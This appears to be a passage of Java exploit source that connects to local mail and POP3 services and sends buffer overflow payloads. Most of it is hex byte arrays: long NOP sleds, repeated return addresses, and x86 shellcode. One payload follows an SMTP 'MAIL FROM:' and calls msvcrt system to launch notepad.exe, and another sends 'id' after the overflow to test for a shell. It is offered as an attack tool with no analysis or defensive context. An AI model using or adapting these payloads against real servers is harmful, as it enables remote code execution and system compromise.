char[] codez90 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez90);
char[] codez91 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez91);
char[] codez92 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez92);
char[] codez93 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez93);
char[] codez94 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez94);
char[] codez95 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez95);
char[] codez96 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez96);
char[] codez97 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez97);
char[] codez98 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez98);
char[] codez99 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez99);
char[] codez100 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez100);
char[] codez101 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez101);
char[] codez102 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez102);
char[] codez103 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez103);
char[] codez104 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez104);
char[] codez105 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez105);
char[] codez106 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez106);
char[] codez107 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez107);
char[] codez108 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez108);
char[] codez109 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez109);
char[] codez110 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez110);
char[] codez111 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez111);
char[] codez112 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez112);
char[] codez113 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez113);
char[] codez114 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez114);
char[] codez115 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez115);
char[] codez116 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez116);
char[] codez117 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez117);
char[] codez118 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez118);
char[] codez119 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez119);
char[] codez120 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez120);
char[] codez121 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez121);
char[] codez122 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez122);
char[] codez123 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez123);
char[] codez124 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez124);
char[] codez125 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez125);
char[] codez126 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez126);
char[] codez127 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez127);
char[] codez128 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez128);
char[] codez129 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez129);
char[] codez130 = { 0xf0, 0xff, 0xbf, 0x90, 0x90, 0x90, 0x90, 0x0d, 0x0a };
sockout.print(codez130);
char[] codez131 = { 0x0a };
sockout.print(codez131);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez132 = {  };
sockout.print(codez132);
char[] codez133 = { 0x69, 0x64, 0x0a };
sockout.print(codez133);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez134 = {  };
sockout.print(codez134);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
class netc
{
public netc()
{
String host = "localhost";
InputStreamReader inread;
BufferedReader buffread;
int port = 25;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket(host, port);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
shit = sockread.readLine();
System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0x68, 0x65, 0x6c, 0x6f, 0x20, 0x70, 0x65, 0x6e, 0x67, 0x75, 0x69, 0x6e, 0x0d, 0x0a };
sockout.print(codez1);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez2 = {  };
sockout.print(codez2);
char[] codez3 = { 0x4d, 0x41, 0x49, 0x4c, 0x20, 0x46, 0x52, 0x4f, 0x4d, 0x3a, 0x20, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez3);
char[] codez4 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez4);
char[] codez5 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez5);
char[] codez6 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez6);
char[] codez7 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez7);
char[] codez8 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez8);
char[] codez9 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez9);
char[] codez10 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez10);
char[] codez11 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez11);
char[] codez12 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez12);
char[] codez13 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez13);
char[] codez14 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez14);
char[] codez15 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez15);
char[] codez16 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez16);
char[] codez17 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez17);
char[] codez18 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez18);
char[] codez19 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez19);
char[] codez20 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez20);
char[] codez21 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez21);
char[] codez22 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez22);
char[] codez23 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez23);
char[] codez24 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez24);
char[] codez25 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez25);
char[] codez26 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez26);
char[] codez27 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez27);
char[] codez28 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez28);
char[] codez29 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez29);
char[] codez30 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez30);
char[] codez31 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez31);
char[] codez32 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez32);
char[] codez33 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez33);
char[] codez34 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez34);
char[] codez35 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez35);
char[] codez36 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez36);
char[] codez37 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez37);
char[] codez38 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez38);
char[] codez39 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez39);
char[] codez40 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez40);
char[] codez41 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez41);
char[] codez42 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez42);
char[] codez43 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez43);
char[] codez44 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez44);
char[] codez45 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez45);
char[] codez46 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez46);
char[] codez47 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez47);
char[] codez48 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez48);
char[] codez49 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez49);
char[] codez50 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez50);
char[] codez51 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez51);
char[] codez52 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez52);
char[] codez53 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez53);
char[] codez54 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez54);
char[] codez55 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez55);
char[] codez56 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez56);
char[] codez57 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez57);
char[] codez58 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez58);
char[] codez59 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez59);
char[] codez60 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez60);
char[] codez61 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez61);
char[] codez62 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez62);
char[] codez63 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez63);
char[] codez64 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez64);
char[] codez65 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez65);
char[] codez66 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez66);
char[] codez67 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez67);
char[] codez68 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez68);
char[] codez69 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez69);
char[] codez70 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez70);
char[] codez71 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez71);
char[] codez72 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez72);
char[] codez73 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez73);
char[] codez74 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez74);
char[] codez75 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez75);
char[] codez76 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb, 0x06, 0x90, 0x90, 0x6b, 0xa0, 0xf7, 0xbf, 0xeb, 0x4b };
sockout.print(codez76);
char[] codez77 = { 0x5b, 0x53, 0x32, 0xe4, 0x83, 0xc3, 0x0b, 0x4b, 0x88, 0x23, 0xb8, 0x50, 0x77, 0xf7, 0xbf, 0xff };
sockout.print(codez77);
char[] codez78 = { 0xd0, 0x8b, 0xd0, 0x52, 0x43, 0x53, 0x52, 0x32, 0xe4, 0x83, 0xc3, 0x06, 0x88, 0x23, 0xb8, 0x28 };
sockout.print(codez78);
char[] codez79 = { 0x6e, 0xf7, 0xbf, 0xff, 0xd0, 0x8b, 0xf0, 0x5a, 0x43, 0x53, 0x52, 0x32, 0xe4, 0x83, 0xc3, 0x04 };
sockout.print(codez79);
char[] codez80 = { 0x88, 0x23, 0xb8, 0x28, 0x6e, 0xf7, 0xbf, 0xff, 0xd0, 0x8b, 0xf8, 0x43, 0x53, 0x83, 0xc3, 0x0b };
sockout.print(codez80);
char[] codez81 = { 0x32, 0xe4, 0x88, 0x23, 0xff, 0xd6, 0x33, 0xc0, 0x50, 0xff, 0xd7, 0xe8, 0xb0, 0xff, 0xff, 0xff };
sockout.print(codez81);
char[] codez82 = { 0x6d, 0x73, 0x76, 0x63, 0x72, 0x74, 0x2e, 0x64, 0x6c, 0x6c, 0x2e, 0x73, 0x79, 0x73, 0x74, 0x65 };
sockout.print(codez82);
char[] codez83 = { 0x6d, 0x2e, 0x65, 0x78, 0x69, 0x74, 0x2e, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2e, 0x65 };
sockout.print(codez83);
char[] codez84 = { 0x78, 0x65 };
sockout.print(codez84);
char[] codez85 = { 0x0a };
sockout.print(codez85);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez86 = {  };
sockout.print(codez86);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
class qpop
{
public qpop()
{
String host = "localhost";
InputStreamReader inread;
BufferedReader buffread;
int port = 110;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket(host, port);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
shit = sockread.readLine();
System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez1);
char[] codez2 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez2);
char[] codez3 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez3);
char[] codez4 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez4);
char[] codez5 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez5);
char[] codez6 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez6);
char[] codez7 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez7);
char[] codez8 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez8);
char[] codez9 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez9);
char[] codez10 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez10);
